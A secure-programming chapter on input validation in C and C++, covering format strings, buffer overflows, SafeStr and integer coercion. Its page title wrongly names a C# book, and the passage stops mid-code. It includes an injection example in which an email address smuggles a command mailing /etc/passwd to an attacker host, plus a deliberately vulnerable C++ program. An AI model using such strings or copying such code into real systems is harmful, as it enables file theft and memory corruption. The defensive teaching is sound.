Input Validation - Adaptive Code via C#. Agile coding with design patterns and SOLID principles (2014)

Adaptive Code via C#. Agile coding with design patterns and SOLID principles (2014)

Chapter 3. Input Validation

Eavesdropping attacks are often easy to launch, but most people don't worry about them in their applications. Instead, they tend to worry about what malicious things can be done on the machine on which the application is running. Most people are far more worried about active attacks than they about passive attacks.

Pretty much every active attack out there is the result of some kind of input from an attacker. Secure programming is largely about making sure that inputs from bad people do not do bad things. Indeed, most of this book addresses how to deal with malicious inputs. For example, cryptography and a strong authentication protocol can help prevent attackers from capturing someone else's login credentials and sending those credentials as input to the program.

If this entire book focuses primarily on preventing malicious inputs, why do we have a chapter specifically devoted to this topic? It's because this chapter is about one important class of defensive techniques: input validation.

In this chapter, we assume that people are connected to our software, and that some of them may send malicious data (even if we think there is a trusted client on the other end). One question we really care about is this: "What does our application do with that data?" In particular, does the program take data that should be untrusted and do something potentially security-critical with it? More importantly, can any untrusted data be used to manipulate the application or the underlying system in a way that has security implications?

3.1. Understanding Basic Data Validation Techniques

Problem

You have data coming into your application, and you would like to filter or reject data that might be malicious.

Solution

Perform data validation at all levels whenever possible. At the very least, make sure data is filtered on input.

Match constructs that are known to be valid and harmless. Reject anything else.

In addition, be sure to be skeptical about any data coming from a potentially insecure channel. In a client-server architecture, for example, even if you wrote the client, the server should never assume it is talking to a trusted client.

Discussion

Applications should not trust any external input. We have often seen situations in which people had a custom client-server application and the application developer assumed that, because the client was written in house by trusted, strong coders, there was nothing to worry about in terms of malicious data being injected.

Those kinds of assumptions lead people to do things that turn out badly, such as embedding in a client SQL queries or shell commands that get sent to a server and executed. In such a scenario, an attacker who is good at reverse engineering can replace the SQL code in the client-side binary with malicious SQL code (perhaps code that reads private records or deletes important data). The attacker could also replace the actual client with a handcrafted client.

In many situations, an attacker who does not even have control over the client is nevertheless able to inject malicious data. For example, he might inject bogus data into the network stream. Cryptography can sometimes help, but even then, we have seen situations in which the attacker did not need to send data that decrypted properly to cause a problem—for example, as a buffer overflow in the portion of an application that does the decryption.

You can regard input validation as a kind of access control mechanism. For example, you will generally want to validate that the person on the other end of the connection has the right credentials to perform the operations that she is requesting. However, when you're doing data validation, most often you'll be worried about input that might do things that no user is supposed to be able to do.

For example, an access control mechanism might determine whether a user has the right to use your application to send email. If the user has that privilege, and your software calls out to the shell to send email (which is generally a bad idea), the user should not be able to manipulate the data in such a way that he can do anything other than send mail as intended.

Let's look at basic rules for proper data validation:

Assume all input is guilty until proven otherwise.

As we said earlier, you should never trust external input that comes from outside the trusted base. In addition, you should be very skeptical about which components of the system are trusted, even after you have authenticated the user on the other end!

Prefer rejecting data to filtering data.

If you determine that a piece of data might possibly be malicious, your best bet from a security perspective is to assume that using the data will screw you up royally no matter what you do, and act accordingly. In some environments, you might need to be able to handle arbitrary data, in which case you will need to treat all input in a way that ensures everything is benign. Avoid the latter situation if possible, because it is a lot harder to get right.

Perform data validation both at input points and at the component level.

One of the most important principles in computer security, defense in depth , states that you should provide multiple defenses against a problem if a single defense may fail. This is important in input validation. You can check the validity of data as it comes in from the network, and you can check it right before you use the data in a manner that might possibly have security implications. However, each one of these techniques alone is somewhat error-prone.

When you're checking input at the points where data arrives, be aware that components might get ripped out and matched with code that does not do the proper checking, making the components less robust than they should be. More importantly, it is often very difficult to understand enough about the context of the data well enough to make validation easy when data is fresh from the network. That is, routines that read from a socket usually do not understand anything about the state the application is in. Without such knowledge, input routines can do only rudimentary filtering.

On the other hand, when you're checking input at the point before you use it, it's often easy to forget to perform the check. Most of the time, you will want to make life easier by producing your own wrapper API to do the filtering, but sometimes you might forget to call it or end up calling it improperly. For example, many people try to use strncpy( ) to help prevent buffer overflows, but it is easy to use this function in the wrong way, as we discuss in Recipe 3.3.

Do not accept commands from the user unless you parse them yourself.

Many data input problems involve the program's passing off data that came from an untrusted source to some other entity that actually parses and acts on the data. If the component doing the parsing has to trust its caller, bad things can happen if your software does not do the proper checking. The best known example of this is the Unix command shell. Sometimes, programs will accomplish tasks by using functions such as system( ) or popen( ) that invoke a shell (which is often a bad idea by itself; see Recipe 1.7). (We'll look at the shell input problem later in this chapter.) Another popular example is the database query using the SQL language. (We'll discuss input validation problems with SQL in Recipe 3.11.)

Beware of special commands, characters, and quoting.

One obvious thing to do when using a command language such as the Unix shell or SQL is to construct commands in trusted software, instead of allowing users to send commands that get proxied. However, there is another "gotcha" here. Suppose that you provide users the ability to search a database for a word. When the user gives you that word, you may be inclined to concatenate it to your SQL command. If you do not validate the input, the user might be able to run other commands.

Consider what happens if you have a server application that, among other things, can send email. Suppose that the email address comes from an untrusted client. If the email address is placed into a buffer using a format string like "/bin/mail %s < /tmp/email", what happens if the user submits the following email address: "dummy@address.com; cat /etc/passwd | mail some@attacker.org"?

Make policy decisions based on a "default deny" rule.

There are two different approaches to data filtering. With the first, known as whitelisting , you accept input as valid only if it meets specific criteria. Otherwise, you reject it. If you do this, the major thing you need to worry about is whether the rules that define your whitelist are actually correct!

With the other approach, known as blacklisting , you reject only those things that are known to be bad. It is much easier to get your policy wrong when you take this approach.

For example, if you really want to invoke a mail program by calling a shell, you might take a whitelist approach in which you allow only well-formed email addresses, as discussed in Recipe 3.9. Or you might use a slightly more liberal (less exact) whitelist policy in which you only allow letters, digits, the @ sign, and periods.

With a blacklist approach, you might try to block out every character that might be leveraged in an attack. It is hard to be sure that you are not missing something here, particularly if you try to consider every single operational environment in which your software may be deployed. For example, if calling out to a shell, you may find all the special characters for the bash shell and check for those, but leave people using tcsh (or something unusual) open to attack.

You can look for a quoting mechanism, but know how to use it properly.

Sometimes, you really do need to be able to accept arbitrary data from an untrusted source and use that data in a security-critical way. For example, you might want to be able to put arbitrary contents from arbitrary documents into a database. In such a case, you might look for some kind of quoting mechanism. For example, you can usually stick untrusted data in single quotes in such an environment.

However, you need to be aware of ways in which an attacker can leave the quoted environment, and you must actively make sure that the attacker does not try to use them. For example, what happens if the attacker puts a single quote in the data? Will that end the quoting, allowing the rest of the attacker's data to do malicious things? If there are such escapes, you should check for them. In this particular example, you might be able to replace quotes in the attacker's data with a backslash followed by a quote.

When designing your own quoting mechanisms, do not allow escapes.

Following from the previous point, if you need to filter data instead of rejecting potentially harmful data, it is useful to provide functions that properly quote an arbitrary piece of data for you. For example, you might have a function that quotes a string for a database, ensuring that the input will always be interpreted as a single string and nothing more. Such a function would put quotes around the string and additionally escape anything that could thwart the surrounding quotes (such as a nested quote).

The better you understand the data, the better you can filter it.

Rough heuristics like "accept the following characters" do not always work well for data validation. Even if you filter out all bad characters, are the resulting combinations of benign characters a problem? For example, if you pass untrusted data through a shell, do you want to take the risk that an attacker might be able to ignore metacharacters but still do some damage by throwing in a well-placed shell keyword?

The best way to ensure that data is not bad is to do your very best to understand the data and the context in which that data will be used. Therefore, even if you're passing data on to some other component, if you need to trust the data before you send it, you should parse it as accurately as possible. Moreover, in situations where you cannot be accurate, at least be conservative, and assume that the data is malicious.

See Also

Recipe 1.7, Recipe 3.3, Recipe 3.9, Recipe 3.11

3.2. Preventing Attacks on Formatting Functions

Problem

You use functions such as printf( ) or syslog( ) in your program, and you want to ensure that you use them in such a way that an attacker cannot coerce them into behaving in ways that you do not intend.

Solution

Functions such as the printf( ) family of functions provide a flexible and powerful way to format data easily. Unfortunately, they can be extremely dangerous as well. Following the guidelines outlined in the following Section 3.2.3 will allow you to easily avert many of the problems with these functions.

Discussion

The printf( ) family of functions—and other functions that use them, such as syslog( ) on Unix systems—all require an argument that specifies a format, as well as a variable number of additional arguments that are substituted at various locations in the format string to produce formatted output. The functions come in two major varieties:

§ Those that output to a file (printf( ) outputs to stdout)

§ Those that output to a string

Both can be dangerous, but the latter variety is significantly more so.

The format string is copied, character by character, until a percent ( %) symbol is encountered. The characters that immediately follow the percent symbol determine what will be output in their place. For each substitution in the format string, the next argument in the variable argument list is used. Because of the way that variable-sized argument lists work in C (see Recipe 13.4), the functions assume that the number of arguments present in the argument list is equal to the number of substitutions required by the format string. The GCC compiler in particular will recognize calls to the functions in the printf( ) family, and it will emit warnings if it detects data type mismatches or an incorrect number of arguments in the variable argument list.

If you adhere to the following guidelines when using the printf( ) family of functions, you can be reasonably certain that you are using the functions safely:

Beware of the "%n" substitution.

All but one of the substitutions recognized by the printf( ) family of functions use arguments from the variable argument list as data to be substituted into the output. The lone exception is "%n", which writes the number of bytes written to the output buffer or file into the memory location pointed to by the next argument in the argument list.

While the "%n" substitution has its place, few programmers are aware of it and its implications. In particular, if external input is used for the format string, an attacker can embed a "%n" substitution into the format string to overwrite portions of the stack. The real problem occurs when all of the arguments in the variable argument list have been exhausted. Because arguments are passed on the stack in C, the formatting function will write into the stack.

To combat malicious uses of "%n", Immunix has produced a set of patches for glibc 2.2 (the standard C runtime library for Linux) known as FormatGuard. The patches take advantage of a GCC compiler extension that allows the preprocessor to distinguish between macros having the same name, but different numbers of arguments. FormatGuard essentially consists of a large set of macros for the syslog( ), printf( ), fprintf( ), sprintf( ), and snprintf( ) functions; the macros call safe versions of the respective functions. The safe functions count the number of substitutions in the format string, and ensure that the proper number of arguments has been supplied.

Do not use a string from an external source directly as the format specification.

Strings obtained from an external source may contain unexpected percent symbols in them, causing the formatting function to attempt to substitute arguments that do not exist. If you need simply to output the string str (to stdout using printf( ), for example), do the following:

printf("%s", str);

Following this rule to the letter is not always desirable. In particular, your program may need to obtain format strings from a data file as a consequence of internationalization requirements. The format strings will vary to some extent depending on the language in use, but they should always have identical substitutions.

When using vsprintf( ) or sprintf( ) to output to a string, be very careful of using the "%s" substitution without specifying a precision.

The vsprintf( ) and sprintf( ) functions both assume an infinite amount of space is available in the buffer into which they write their output. It is especially common to use these functions with a statically allocated output buffer. If a string substitution is made without specifying the precision, and that string comes from an external source, there is a good chance that an attacker may attempt to overflow the static buffer by forcing a string that is too long to be written into the output buffer. (See Recipe 3.3 for a discussion of buffer overflows.)

One solution is to check the length of the string to be substituted into the output before using it with vsprintf( ) or sprintf( ). Unfortunately, this solution is error-prone, especially later in your program's life when another programmer has to make a change to the size of the buffer or the format string, necessitating a change to the check.

A better solution is to use a precision modifier in the format string. For example, if no more than 12 characters from a string should ever be substituted into the output, use "%.12s" instead of simply "%s". The advantage to this solution is that it is part of the formatting function call; thus, it is less likely to be overlooked in the event of a later change to the format string.

Avoid using vsprintf( ) and sprintf( ). Use vsnprintf( ) and snprintf( ) or vasprintf( ) and asprintf( ) instead. Alternatively, use a secure string library such as SafeStr (see Recipe 3.4).

The functions vsprintf( ) and sprintf( ) assume that the buffer into which they write their output is large enough to hold it all. This is never a safe assumption to make and frequently leads to buffer overflow vulnerabilities. (See Recipe 3.3.)

The functions vasprintf( ) and asprintf( ) dynamically allocate a buffer to hold the formatted output that is exactly the required size. There are two problems with these functions, however. The first is that they're not portable. Most modern BSD derivatives (Darwin, FreeBSD, NetBSD, and OpenBSD) have them, as does Linux. Unfortunately, older Unix systems and Windows do not. The other problem is that they're slower because they need to make two passes over the format string, one to calculate the required buffer size, and the other to actually produce output in the allocated buffer.

The functions vsnprintf( ) and snprintf( ) are just as fast as vsprintf( ) and sprintf( ), but like vasprintf( ) and asprintf( ), they are not yet portable. They are defined in the C99 standard for C, and they typically enjoy the same availability as vasprintf( ) and asprintf( ). They both require an additional argument that specifies the length of the output buffer, and they will never write more data into the buffer than will fit, including the NULL terminating character.

See Also

§ FormatGuard from Immunix: http://www.immunix.org/formatguard.html

§ Recipe 3.3, Recipe 13.4

3.3. Preventing Buffer Overflows

Problem

C and C++ do not perform array bounds checking, which turns out to be a security-critical issue, particularly in handling strings. The risks increase even more dramatically when user-controlled data is on the program stack (i.e., is a local variable).

Solution

There are many solutions to this problem, but none are satisfying in every situation. You may want to rely on operational protections such as StackGuard from Immunix, use a library for safe string handling, or even use a different programming language.

Discussion

Buffer overflows get a lot of attention in the technical world, partially because they constitute one of the largest classes of security problems in code, but also because they have been around for a long time and are easy to get rid of, yet still are a huge problem.

Buffer overflows are generally very easy for a C or C++ programmer to understand. An experienced programmer has invariably written off the end of an array, or indexed into the wrong memory because she improperly checked the value of the index variable.

Because we assume that you are a C or C++ programmer, we won't insult your intelligence by explaining buffer overflows to you. If you do not already understand the concept, you can consult many other software security books, including Building Secure Software by John Viega and Gary McGraw (Addison Wesley). In this recipe, we won't even focus so much on why buffer overflows are such a big deal (other resources can help you understand that if you're insatiably curious). Instead, we'll focus on state-of-the-art strategies for mitigating these problems.

String handling

Most languages do not have buffer overflow problems at all, because they ensure that writes to memory are always in bounds. This can sometimes be done at compile time, but generally it is done dynamically, right before data gets written. The C and C++ philosophy is different—you are given the ability to eke out more speed, even if it means that you risk shooting yourself in the foot.

Unfortunately, in C and C++, it is not only possible to overflow buffers but also easy, particularly when dealing with strings. The problem is that C strings are not high-level data types; they are arrays of characters. The major consequence of this nonabstraction is that the language does not manage the length of strings; you have to do it yourself. The only time C ever cares about the length of a string is in the standard library, and the length is not related to the allocated size at all—instead, it is delimited by a 0-valued (NULL) byte. Needless to say, this can be extremely error-prone.

One of the simplest examples is the ANSI C standard library function, gets( ) :

char *gets(char *str);

This function reads data from the standard input device into the memory pointed to by str until there is a newline or until the end of file is reached. It then returns a pointer to the buffer. In addition, the function NULL-terminates the buffer.

If the buffer in question is a local variable or otherwise lives on the program stack, then the attacker can often force the program to execute arbitrary code by overwriting important data on the stack. This is called a stack-smashing attack. Even when the buffer is heap-allocated (that is, it is allocated with malloc() or new(), a buffer overflow can be security-critical if an attacker can write over critical data that happens to be in nearby memory.

The problem with this function is that, no matter how big the buffer is, an attacker can always stick more data into the buffer than it is designed to hold, simply by avoiding the newline.

There are plenty of other places where it is easy to overflow strings. Pretty much any time you perform an operation that writes to a "string," there is room for a problem. One famous example is strcpy( ) :

char *strcpy(char *dst, const char *src);

This function copies bytes from the address indicated by src into the buffer pointed to by dst, up to and including the first NULL byte in src. Then it returns dst. No effort is made to ensure that the dst buffer is big enough to hold the contents of the src buffer. Because the language does not track allocated sizes, there is no way for the function to do so.

To help alleviate the problems with functions like strcpy( ) that have no way of determining whether the destination buffer is big enough to hold the result from their respective operations, there are also functions like strncpy( ) :

char *strncpy(char *dst, const char *src, size_t len);

The strncpy( ) function is certainly an improvement over strcpy( ), but there are still problems with it. Most notably, if the source buffer contains more data than the limit imposed by the len argument, the destination buffer will not be NULL-terminated. This means the programmer must ensure the destination buffer is NULL-terminated. Unfortunately, the programmer often forgets to do so; there are two reasons for this failure:

§ It's an additional step for what should be a simple operation.

§ Many programmers do not realize that the destination buffer may not be NULL-terminated.

The problems with strncpy( ) are further complicated by the fact that a similar function, strncat( ), treats its length-limiting argument in a completely different manner. The difference in behavior serves only to confuse programmers, and more often than not, mistakes are made. Certainly, we recommend using strncpy( ) over using strcpy( ); however, there are better solutions.

OpenBSD 2.4 introduced two new functions, strlcpy( ) and strlcat( ) , that are consistent in their behavior, and they provide an indication back to the caller of how much space in the destination buffer would be required to successfully complete their respective operations without truncating the results. For both functions, the length limit indicates the maximum size of the destination buffer, and the destination buffer is always NULL-terminated, even if the destination buffer must be truncated.

Unfortunately, strlcpy( ) and strlcat( ) are not available on all platforms; at present, they seem to be available only on Darwin, FreeBSD, NetBSD, and OpenBSD. Fortunately, they are easy to implement yourself—but you don't have to, because we provide implementations here:

#include <sys/types.h>

#include <string.h>

size_t strlcpy(char *dst, const char *src, size_t size) {

char *dstptr = dst;

size_t tocopy = size;

const char *srcptr = src;

if (tocopy && --tocopy) {

do {

if (!(*dstptr++ = *srcptr++)) break;

} while (--tocopy);

}

if (!tocopy) {

if (size) *dstptr = 0;

while (*srcptr++);

}

return (srcptr - src - 1);

}

size_t strlcat(char *dst, const char *src, size_t size) {

char *dstptr = dst;

size_t dstlen, tocopy = size;

const char *srcptr = src;

while (tocopy-- && *dstptr) dstptr++;

dstlen = dstptr - dst;

if (!(tocopy = size - dstlen)) return (dstlen + strlen(src));

while (*srcptr) {

if (tocopy != 1) {

*dstptr++ = *srcptr;

tocopy--;

}

srcptr++;

}

*dstptr = 0;

return (dstlen + (srcptr - src));

}

As part of its security push, Microsoft has developed a new set of string-handling functions for C and C++ that are defined in the header file strsafe.h . The new functions handle both ANSI and Unicode character sets, and each function is available in byte count and character count versions. For more information regarding using strsafe.h functions in your Windows programs, visit the Microsoft Developer's Network (MSDN) reference for strsafe.h.

All of the string-handling improvements we've discussed so far operate using traditional C-style NULL-terminated strings. While strlcat( ), strlcpy( ), and Microsoft's new string-handling functions are vast improvements over the traditional C string-handling functions, they all still require diligence on the part of the programmer to maintain information regarding the allocated size of destination buffers.

An alternative to using traditional C style strings is to use the SafeStr library, which is available from http://www.zork.org/safestr/. The library is a safe string implementation that provides a new, high-level data type for strings, tracks accounting information for strings, and performs many other operations. For interoperability purposes, SafeStr strings can be passed to C string functions, as long as those functions use the string in a read-only manner. (We discuss SafeStr in some detail in Recipe 3.4.)

Finally, applications that transfer strings across a network should consider including a string's length along with the string itself, rather than requiring the recipient to rely on finding the NULL-terminating character to determine the length of the string. If the length of the string is known up front, the recipient can allocate a buffer of the proper size up front and read the appropriate amount of data into it. The alternative is to read byte-by-byte, looking for the NULL-terminator, and possibly repeatedly resizing the buffer. Dan J. Bernstein has defined a convention called Netstrings(http://cr.yp.to/proto/netstrings.txt) for encoding the length of a string with the strings. This protocol simply has you send the length of the string represented in ASCII, then a colon, then the string itself, then a trailing comma. For example, if you were to send the string "Hello, World!" over a network, you would send:

14:Hello, World!,

Note that the Netstrings representation does not include the NULL-terminator, as that is really part of the machine-specific representation of a string, and is not necessary on the network.

Using C++

When using C++, you generally have a lot less to worry about when using the standard C++ string library, std::string. This library is designed in such a way that buffer overflows are less likely. Standard I/O using the stream operators (>> and <<) is safe when using the standard C++ string type.

However, buffer overflows when using strings in C++ are not out of the question. First, the programmer may choose to use old fashioned C API functions, which work fine in C++ but are just as risky as they are in C. Second, while C++ usually throws an out_of_range exception when an operation would overflow a buffer, there are two cases where it doesn't.

The first problem area occurs when using the subscript operator, []. This operator doesn't perform bounds checking for you, so be careful with it.

The second problem area occurs when using C-style strings with the C++ standard library. C-style strings are always a risk, because even C++ doesn't know how much memory is allocated to a string. Consider the following C++ program:

#include <iostream.h>

// WARNING: This code has a buffer overflow in it.

int main(int argc, char *argv[]) {

char buf[12];

cin >> buf;

cout << "You said... " << buf << endl;

}

If you compile the above program without optimization, then you run it, typing in more than 11 printable ASCII characters (remember that C++ will add a NULL to the end of the string), the program will either crash or print out more characters than buf can store. Those extra characters get written past the end of buf.

Also, when indexing a C-style string through C++, C++ always assumes that the indexing is valid, even if it isn't.

Another problem occurs when converting C++-style strings to C-style strings. If you use string::c_str() to do the conversion, you will get a properly NULL-terminated C-style string. However, if you use string::data(), which writes the string directly into an array (returning a pointer to the array), you will get a buffer that is not NULL-terminated. That is, the only difference between c_str() and data() is that c_str() adds a trailing NULL.

One final point with regard to C++ is that there are plenty of applications not using the standard string library, that are instead using third-party libraries. Such libraries are of varying quality when it comes to security. We recommend using the standard library if at all possible. Otherwise, be careful in understanding the semantics of the library you do use, and the possibilities for buffer overflow.

Stack protection technologies

In C and C++, memory for local variables is allocated on the stack. In addition, information pertaining to the control flow of a program is also maintained on the stack. If an array is allocated on the stack, and that array is overrun, an attacker can overwrite the control flow information that is also stored on the stack. As we mentioned earlier, this type of attack is often referred to as a stack-smashing attack.

Recognizing the gravity of stack-smashing attacks, several technologies have been developed that attempt to protect programs against them. These technologies take various approaches. Some are implemented in the compiler (such as Microsoft's /GS compiler flag and IBM's ProPolice), while others are dynamic runtime solutions (such as Avaya Labs's LibSafe).

All of the compiler-based solutions work in much the same way, although there are some differences in the implementations. They work by placing a "canary" (which is typically some random value) on the stack between the control flow information and the local variables. The code that is normally generated by the compiler to return from the function is modified to check the value of the canary on the stack, and if it is not what it is supposed to be, the program is terminated immediately.

The idea behind using a canary is that an attacker attempting to mount a stack-smashing attack will have to overwrite the canary to overwrite the control flow information. By choosing a random value for the canary, the attacker cannot know what it is and thus be able to include it in the data used to "smash" the stack.

When a program is distributed in source form, the developer of the program cannot enforce the use of StackGuard or ProPolice because they are both nonstandard extensions to the GCC compiler. It is the responsibility of the person compiling the program to make use of one of these technologies. On the other hand, although it is rare for Windows programs to be distributed in source form, the /GS compiler flag is a standard part of the Microsoft Visual C++ compiler, and the program's build scripts (whether they are Makefiles, DevStudio project files, or something else entirely) can enforce the use of the flag.

For Linux systems, Avaya Labs' LibSafe technology is not implemented as a compiler extension, but instead takes advantage of a feature of the dynamic loader that causes a dynamic library to be preloaded with every executable. Using LibSafe does not require the source code for the programs it protects, and it can be deployed on a system-wide basis.

LibSafe replaces the implementation of several standard functions that are known to be vulnerable to buffer overflows, such as gets( ), strcpy( ), and scanf( ). The replacement implementations attempt to compute the maximum possible size of a statically allocated buffer used as a destination buffer for writing using a GCC built-in function that returns the address of the frame pointer. That address is normally the first piece of information on the stack after local variables. If an attempt is made to write more than the estimated size of the buffer, the program is terminated.

Unfortunately, there are several problems with the approach taken by LibSafe. First, it cannot accurately compute the size of a buffer; the best it can do is limit the size of the buffer to the difference between the start of the buffer and the frame pointer. Second, LibSafe's protections will not work with programs that were compiled using the -fomit-frame-pointer flag to GCC, an optimization that causes the compiler not to put a frame pointer on the stack. Although relatively useless, this is a popular optimization for programmers to employ. Finally, LibSafe will not work on setuid binaries without static linking or a similar trick.

In addition to providing protection against conventional stack-smashing attacks, the newest versions of LibSafe also provide some protection against format-string attacks (see Recipe 3.2). The format-string protection also requires access to the frame pointer because it attempts to filter out arguments that are not pointers into the heap or the local variables on the stack.

See Also

§ MSDN reference for strsafe.h: http://msdn.microsoft.com/library/en-us/winui/winui/windowsuserinterface/resources/strings/usingstrsafefunctions.asp

§ SafeStr from Zork: http://www.zork.org/safestr/

§ StackGuard from Immunix: http://www.immunix.org/stackguard.html

§ ProPolice from IBM: http://www.trl.ibm.com/projects/security/ssp/

§ LibSafe from Avaya Labs: http://www.research.avayalabs.com/project/libsafe/

§ Netstrings by Dan J. Bernstein: http://cr.yp.to/proto/netstrings.txt

§ Recipe 3.2, Recipe 3.4

3.4. Using the SafeStr Library

Problem

You want an alternative to using the standard C string-manipulation functions to help avoid buffer overflows (see Recipe 3.3), format-string problems (see Recipe 3.2), and the use of unchecked external input.

Solution

Use the SafeStr library, which is available from http://www.zork.org/safestr/.

Discussion

The SafeStr library provides an implementation of dynamically sizable strings in C. In addition, the library also performs reference counting and accounting of the allocated and actual sizes of each string. Any attempt to increase the actual size of a string beyond its allocated size causes the library to increase the allocated size of the string to a size at least as large. Because strings managed by SafeStr ("safe strings") are dynamically sized, safe strings are not a source of potential buffer overflows. (See Recipe 3.3.)

Safe strings use the type safestr_t , which can actually be cast to the normal C-style string type, char *, though we strongly recommend against doing so where it can be avoided. In fact, the only time you should ever cast a safe string to a normal C-style string is for read-only purposes. This is also the only reason why the safestr_t type was designed in a way that allows casting to normal C-style strings.

WARNING

Casting a safe string to a normal C-style string and modifying it using C-style string-manipulation functions or other means defeats the protections and accounting afforded by the SafeStr library.

The SafeStr library provides a rich set of API functions to manipulate the strings it manages. The large number of functions prohibits us from enumerating them all here, but note that the library comes with complete documentation in the form of Unix man pages, HTML, and PDF. Table 3-1lists the functions that have C equivalents, along with those equivalents.

Table 3-1. SafeStr API functions and equivalents for normal C strings

SafeStr function

C function

safestr_append( )

strcat( )

safestr_nappend( )

strncat( )

safestr_find( )

strstr( )

safestr_copy( )

strcpy( )

safestr_ncopy( )

strncpy( )

safestr_compare( )

strcmp( )

safestr_ncompare( )

strncmp( )

safestr_length( )

strlen( )

safestr_sprintf( )

sprintf( )

safestr_vsprintf( )

vsprintf( )

You can typically create safe strings in any of the following three ways:

SAFESTR_ALLOC( )

Allocates a resizable string with an initial allocation size in bytes as specified by its only argument. The string returned will be an empty string (actual size zero). Normally the size allocated for a string will be larger than the actual size of the string. The library rounds memory allocations up, so if you know that you will need a large string, it is worth allocating it with a large initial allocation size up front to avoid reallocations as the actual string length grows.

SAFESTR_CREATE( )

Creates a resizable string from the normal C-style string passed as its only argument. This is normally the appropriate way to convert a C-style string to a safe string.

SAFESTR_TEMP( )

Creates a temporary resizable string from the normal C-style string passed as its only argument. SAFESTR_CREATE( ) and SAFESTR_TEMP( ) behave similarly, except that a string created by SAFESTR_TEMP( ) will be automatically destroyed by the next SafeStr function that uses it. The only exception is safestr_reference( ), which increments the reference count on the string, allowing it to survive until safestr_release( ) or safestr_free( ) is called to decrement the string's reference count.

People are sometimes confused about when actually to use SAFESTR_TEMP( ), as well as how to use it properly. Use SAFESTR_TEMP( ) when you need to pass a constant string as an argument to a function that is expecting a safestr_t. A perfect example of such a case would be safestr_sprintf( ), which has the following signature:

int safestr_sprintf(safestr_t *output, safestr_t *fmt, ...);

The string that specifies the format must be a safe string, but because you should always use constant strings for the format specification (see Recipe 3.2), you should use SAFESTR_TEMP( ). The alternative is to use SAFESTR_CREATE( ) to create the string before calling safestr_sprintf( ), and free it immediately afterward with safestr_free( ).

int i = 42;

safestr_t fmt, output;

output = SAFESTR_ALLOC(1);

/* Instead of doing this: */

fmt = SAFESTR_CREATE("The value of i is %d.\n");

safestr_sprintf(&output, fmt, i);

safestr_free(fmt);

/* You can do this: */

safestr_sprintf(&output, SAFESTR_TEMP("The value of i is %d.\n"), i);

When using temporary strings, remember that the temporary string will be destroyed automatically after a call to any SafeStr API function except safestr_reference( ) , which will increment the string's reference count. If a temporary string's reference count is incremented, the string will then survive any number of API calls until its reference count is decremented to the extent that it will be destroyed. The API functions safestr_release( ) and safestr_free( ) may be used interchangeably to decrement a string's reference count.

For example, if you are writing a function that accepts a safestr_t as an argument (which may or may not be passed as a temporary string) and you will be performing multiple operations on the string, you should increment the string's reference count before operating on it, and decrement it again when you are finished. This will ensure that the string is not prematurely destroyed if a temporary string is passed in to the function.

void some_function(safestr_t *base, safestr_t extra) {

safestr_reference(extra);

if (safestr_length(*base) + safestr_length(extra) < 17)

safestr_append(base, extra);

safestr_release(extra);

}

In this example, if you omitted the calls to safestr_reference( ) and safestr_release( ), and if extra was a temporary string, the call to safestr_length( ) would cause the string to be destroyed. As a result, the safestr_append( ) call would then be operating on an invalid safestr_t if the combined length of base and extra were less than 17.

Finally, the SafeStr library also tracks the trustworthiness of strings. A string can be either trusted or untrusted. Operations that combine strings result in untrusted strings if any one of the strings involved in the combination is untrusted; otherwise, the result is trusted. There are few places inSafeStr's API where the trustworthiness of a string is tested, but the function safestr_istrusted( ) allows you to test strings yourself.

The strings that result from using SAFESTR_CREATE( ) or SAFESTR_TEMP( ) are untrusted. You can use SAFESTR_TEMP_TRUSTED( ) to create temporary strings that are trusted. The trustworthiness of an existing string can be altered using safestr_trust( ) to make it trusted or safestr_untrust( ) to make it untrusted.

The main reason to track the trustworthiness of a string is to monitor the flow of external inputs. Safe strings created from external data should initially be untrusted. If you later verify the contents of a string, ensuring that it contains nothing dangerous, you can then mark the string as trusted. Whenever you need to use a string to perform some potentially dangerous operation (for example, using a string in a command-line argument to an external program), check the trustworthiness of the string before you use it, and fail appropriately if the string is untrusted.

See Also

§ SafeStr: http://www.zork.org/safestr/

§ Recipe 3.2, Recipe 3.3

3.5. Preventing Integer Coercion and Wrap-Around Problems

Problem

When using integer values, it is possible to make values go out of range in ways that are not obvious. In some cases, improperly validated integer values can lead to security problems, particularly when data gets truncated or when it is converted from a signed value to an unsigned value or vice versa. Unfortunately, such conversions often happen behind your back.

Solution

Unfortunately, integer coercion and wrap-around problems currently require you to be diligent.

Best practices for such problems require that you validate any coercion that takes place. To do this, you need to understand the semantics of the library functions you use well enough to know when they may implicitly cast data.

In addition, you should explicitly check for cases where integer data may wrap around. It is particularly important to perform wrap-around checks immediately before using data.

Discussion

Integer type problems are often quite subtle. As a result, they are very difficult to avoid and very difficult to catch unless you are exceedingly careful. There are several different ways that these problems can manifest themselves, but they always boil down to a type mismatch. In the following subsections, we'll illustrate the various classes of integer type errors with examples.

Signed-to-unsigned coercion

Many API functions take only positive values, and programmers often take advantage of that fact. For example, consider the following code excerpt:

if (x < MAX_SIZE) {

if (!(ptr = (unsigned char *)malloc(x))) abort( );

} else {

/* Handle the error condition ... */

}

We might test against MAX_SIZE to protect against denial of service problems where an attacker causes us to allocate a large amount of memory. At first glance, the previous code seems to protect against that. Indeed, some people will worry about what happens in the case where someone tries to malloc( ) a negative number of bytes.

It turns out that malloc( )'s argument is of type size_t, which is an unsigned type. As a result, any negative numbers are converted to positive numbers. Therefore, we do not have to worry about allocating a negative number of bytes; it cannot happen.

However, the previous code may still not work correctly. The key to its correct operation is the data type of x. If x is some signed data type, such as an int, and is a negative value, we will end up allocating a large amount of data. For example, if an attacker manages to set x to -1, the call tomalloc( ) will try to allocate 4,294,967,295 bytes on most platforms, because the hexadecimal value of that number (0xFFFFFFF) is the same hexadecimal representation of a signed 32-bit -1.

There are a few ways to alleviate this particular problem:

§ You can make sure never to use signed data types. Unfortunately, that is not very practical—particularly when you are using API functions that take both signed and unsigned values. If you try to ensure that all your data is always unsigned, you might end up with an unsigned-to-signed conversion problem when you call a library function that takes a regular int instead of an unsigned int or a size_t.

§ You can check to make sure x is not negative while it is still signed. There is nothing wrong with this solution. Basically, you are always assuming the worst (that the data may be cast), and it might not be.

§ You can cast x to a size_t before you do your testing. This is a good strategy for those who prefer testing data as close as possible to the state in which it is going to be used to prevent an unanticipated change in the meantime. Of course, the cast to a signed value might be unanticipated for the many programmers out there who do not know that size_t is not a signed data type. For those people, the second solution makes more sense.

No matter what solution you prefer, you will need to be diligent about conversions that might apply to your data when you perform your bounds checking.

Unsigned-to-signed coercion

Problems may also occur when an unsigned value gets converted to a signed value. For example, consider the following code:

int main(int argc, char *argv[ ]) {

char foo[ ] = "abcdefghij";

char *p = foo + 4;

unsigned int x = 0xffffffff;

if (p + x > p + strlen(p)) {

